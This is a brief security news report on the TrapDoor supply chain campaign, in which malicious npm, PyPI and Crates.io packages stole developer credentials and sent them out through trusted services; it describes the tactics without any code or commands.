Attack Overview and Infection Mechanism
Security researchers have uncovered a widespread supply chain attack dubbed TrapDoor, involving 34 malicious packages spread across npm, PyPI, and Crates.io. First disclosed on May 24, 2026 by Socket.dev, the campaign published 384 total versions of poisoned packages targeting developers in cryptocurrency, decentralized finance, Solana, AI, and security research fields. The malicious code executed automatically upon package installation or import, requiring no additional victim interaction.
Targeted Data and Cross Platform Reach
The attackers designed the malware to harvest a wide range of sensitive credentials including AWS keys, GitHub tokens, OpenAI API keys, SSH private keys, blockchain wallet files, browser login databases, and environment variables containing passwords. Analysis by SlowMist’s MistEye system examined three representative samples: git-config-sync from PyPI, token-usage-tracker from npm, and sui-framework-helpers from Crates.io. The npm variant additionally attempted to crack weak Ethereum keystore passwords and execute remote commands on infected machines.
Evasion and Infrastructure Tactics
To avoid detection, the threat actors routed stolen data through trusted services including GitHub Pages, GitHub Gist, and webhook.site rather than unfamiliar domains. Since enterprise firewalls routinely allow traffic to these services, the exfiltrated credentials blended into normal network activity. Each ecosystem was exploited differently: PyPI code ran on import, Crates.io executed during compilation, and npm launched silently after installation.
Source: Cyber Security News
